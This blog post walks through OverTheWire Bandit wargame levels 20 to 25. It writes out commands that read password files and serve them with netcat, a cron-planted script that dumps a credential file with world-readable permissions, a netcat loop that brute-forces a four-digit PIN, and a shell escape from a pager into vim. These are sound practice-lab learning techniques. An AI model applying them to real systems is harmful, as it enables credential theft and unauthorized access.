OverTheWire.org Wargames – Bandit – Level 20 to Level 29

Home / OverTheWire.org Wargames – Bandit – Level 20 to Level 29

Initially I post the password in this article. When I move the article here from old site, I think I should remove it.

OverTheWire.org is one of good site offer WarGames. In this context, WarGame is a game specifically designed to help people learn and practice security concepts in the form of fun-filled game. One of wargame category provided by OverTheWire is Bandit category which is aimed at absolute beginners.

This writeup contains solutions of the OverTheWire challenges Bandit category which I solved. The solutions written here is for level 20 above.

Jump Table

How to Play

Bandit, like other games, is organized in levels. We start playing at level 0 and try to “beat” or “finish” it. Finishing a level results in information on how to start the next level. Every level beaten will give clue how to start next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command, but don’t know how to use it, try the manual (man page) by entering “man <command>” (without the quotes). e.g. if you know about the “ls” command, type: man ls. The “man” command also has a manual, try it. Press q to quit the man command.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the “help <X>” command. E.g. help cd
  • Also, your favorite search-engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC

Level 20

ssh [email protected]

pass:

There exist an executable file “suconnect”. It makes a connection to localhost on the port we specify as commandline argument. It then reads a line of text from the connection and compares it to the password in the current level. If the password is correct, it will transmit the password for level 21.

All we need to do is run nc listening on a random port, then connect to it with suconnect. Then we send the password throuch the nc session and suconnect sends back the new password.

$ nc -l 13510 < /etc/bandit_pass/bandit20 &
$ ./suconnect 13510

Level 21

ssh [email protected]

pass:

There is a cron job that we need to look at. In /etc/cron.d there exist some cron files, but our objective is cronjob_bandit22 which look promising. Investigate it to see what this script do.

The script will execute a script on /usr/bin/cronjob_bandit22.sh which will dump /etc/bandit_pass/bandit22 to /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv file.

$ cat /etc/cron.d/cronjob_bandit22
$ cat /usr/bin/cronjob_bandit22.sh
$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

Level 22

ssh [email protected]

pass:

Another cronjob. This time, the script used by cronjob is copying /etc/bandit_pass/bandit23 as something in /tmp. There’s no need for you to figure out the filename, we can always recreate the condition.

$ cat /etc/cron.d/cronjob_bandit23
$ cat /usr/bin/cronjob_bandit23.sh
$ cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)

Level 23

ssh [email protected]

pass:

Another cronjob.

In this level, we need to create our own shell script to run. The cronjob script will execute (and later delete) scripts on /var/spool/bandit24. That way, we can create a script on that directory which dump password from /etc/bandit_pass/bandit24 to anywhere we desire. We just need to make sure the script is executable.

The script we create:

#!/bin/bash

cat /etc/bandit_pass/bandit24 > /tmp/bandit24xathpass
chmod 777 /tmp/bandit23xathpass

Then we do:

cat /tmp/bandit24xathpass

Level 24

ssh [email protected]

pass:

Another tedious level.

There exist a service running on port 30002. It asks two words: password for bandit25 and secret number 4-digit pincode. Those two words are separate by a space. Our only option is bruteforcing all 10000 combinations.

This is one line command but arranged in multiline for clarity.

pass=$(cat /etc/bandit_pass/bandit24)
for i in {0000..9999}; do {
   if 
      echo "$pass $i" | nc localhost 30002 | grep Wrong > /dev/null;
   then 
      echo $i;
   else 
      echo "$pass $i" | nc localhost 30002 && exit;
   fi 
}
done

Level 25

ssh [email protected]

pass:

Logging in to bandit26 from bandit25 should be easy. But when we try to login something strange happen. It’s because the shell is not /bin/bash. Let’s see what it is.

$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

It’s /usr/bin/showtext,  what’s the content?

$ cat /usr/bin/showtext
#!/bin/sh

more ~/text.txt
exit 0

more on text.txt. It turns out we can escape to ‘vim’ by pressing ‘v’. Once in vim, invoke this.

:r /etc/bandit_pass/bandit26

Level 26

ssh [email protected]

pass:

Not Available Yet.

Level 27

ssh [email protected]

pass:

Not Available Yet.

Level 28

ssh [email protected]

pass:

Not Available Yet.

Level 29

ssh [email protected]

pass:

Not Available Yet.

,

About Author

about author

xathrya

A man who is obsessed to low level technology.

Leave a Reply

Your email address will not be published. Required fields are marked *

Social media & sharing icons powered by UltimatelySocial